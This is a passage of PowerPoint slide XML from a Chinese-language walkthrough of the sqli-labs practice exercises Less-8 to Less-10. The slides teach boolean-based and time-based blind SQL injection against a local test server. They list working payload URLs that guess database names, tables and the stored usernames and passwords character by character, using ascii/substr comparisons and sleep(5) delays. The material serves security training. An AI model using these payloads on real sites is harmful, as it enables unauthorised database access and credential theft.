      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="170313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250435"/>
            <a:ext cx="10131425" cy="483856"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-8_01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fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>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/Less-8/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>判断此时存在注入漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>2.  http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>/Less-8/?id=1‘ order by 3--+   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>改为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>的时候，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>you are in….</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>消失，说明存在三列。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>3. http://127.0.0.1/sqli/Less-8/?id=1' and left((select database()),1)=0x73 --+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>猜出来当前第一位是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>或者是使用： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>http://127.0.0.1/sqli/Less-8/?id=1‘ and ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>((select database()),1,1)) &gt; 16--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>此时是有回显的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>4. 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1,1),1,1)) &gt;17 --+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>先通过大于号或者小于号来判断数据库的第一个字母是哪一个，也可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>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4,1),1,1)) = 115--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>此时可以验证数据库中第五个数据库的第一个字母是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>5. 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&gt;11 --+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>判断</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>数据库中的第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>个表中的数据的第一位是否大于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>11,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t> 也可以使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>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=117 --+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>验证数据库中第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>个表中的数据的第一位的第一个字母的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>码是否是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>117</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>，也就是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>u</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="236467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353817"/>
            <a:ext cx="10131425" cy="483856"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-8_02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800" dirty="0"/>
              <a:t>6. http://127.0.0.1/sqli/Less-8/?id=1‘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limit 1,1),1,1)) &gt;10 --+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>同理，进行判断表中的字段，然后进行判断。可以得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>7. http://127.0.0.1/sqli/Less-8/?id=1‘  and ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>((select username from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>security.users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> limit 0,1),1,1)) &gt;10 --+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>同理，进行判断，最后再使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>进行判断。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>8. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>因为猜解速度较慢，可以配合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>或者是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的脚本来使用。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="309914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6B1F7-21FC-4CE5-AA33-E29A17857FC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2060575" y="305854"/>
            <a:ext cx="10131425" cy="414584"/>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E6412B7C-9C1C-4850-A6B8-0425A9FEFF21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="2142067"/>
            <a:ext cx="10785763" cy="3649133"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>IF(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>condition,A,B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>如果条件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>condition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，则执行语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，否则执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>例： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>select if(1&gt;2,4,5);   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>返回的结果是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>（如果是在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>命令行中使用，首先要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>use xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>数据库才行）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B91C6BC5-BD7B-4C28-BCFB-7FA62A39A00B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1611393" y="4202107"/>
            <a:ext cx="4220968" cy="1589093"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="238211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222727"/>
            <a:ext cx="10131425" cy="483856"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-8_01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>法二  时间盲注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094509"/>
            <a:ext cx="11596255" cy="5167746"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>1. http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>/Less-8/?id=1‘ and sleep(5)--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>使用延迟的方法判断是否存在注入漏洞。当然判断是否存在注入漏洞的方法很多。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>2.  http://127.0.0.1/sqli/Less-8/?id=1‘ and if(length(database()) = 8,1,sleep(5))--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>当为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>的时候很快加载，而为其他值得时候加载较慢（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>5s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>左右），那就说明此时数据库的长度就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>3. http://127.0.0.1/sqli/Less-8/?id=1' and if(ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>((select database()),1,1)) &gt;113,1,sleep(5))--+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>如果当前数据库的第一个字母的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>值大于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>113</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>的时候，会立刻返回结果，否则执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>5s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>4. http://127.0.0.1/sqli/Less-8/?id=1‘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4,1),1,1))&gt;112,1,sleep(5))--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>同理判断数据库中的第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>个数据库的第一位的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>的值是不是大于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>112</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>（实际中是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>115</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>），如果是的则速度返回，否则延时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>5s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>返回结果。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>其余步骤与法一基本类似，可以采用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>或者是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>盲注脚本使用。</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407012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928588" y="208872"/>
            <a:ext cx="10131425" cy="483856"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-9</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900" dirty="0"/>
              <a:t>1. http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>/Less-9/?id=1‘  order by 3999--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>当使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>order by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>的时候，此时无论如何都是回显</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>you are in….</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>所以无法使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>order by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>进行判断。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>2. http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>/Less-9/?id=1‘ and sleep(5)--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>当存在注入漏洞时，可以使用延迟注入进行判断，此时若存在漏洞，则睡眠</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>5s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>之后再返回结果。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>3. http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>/Less-9/?id=1‘ and if(length(database())=8,1,sleep(5)); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>通过返回时间进行判断，此时如果数据库长度为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>，则可以较快返回。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>4. http://127.0.0.1/sqli/Less-9/?id=1‘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4,1),1,1))&gt;1112,1,sleep(5))--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>less-8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>中同样的方法进行判断即可</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>因为盲注属于猜解，推荐使用脚本进行操作。</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2943565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353817"/>
            <a:ext cx="10131425" cy="483856"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-10</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62545"/>
            <a:ext cx="11596255" cy="4655128"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
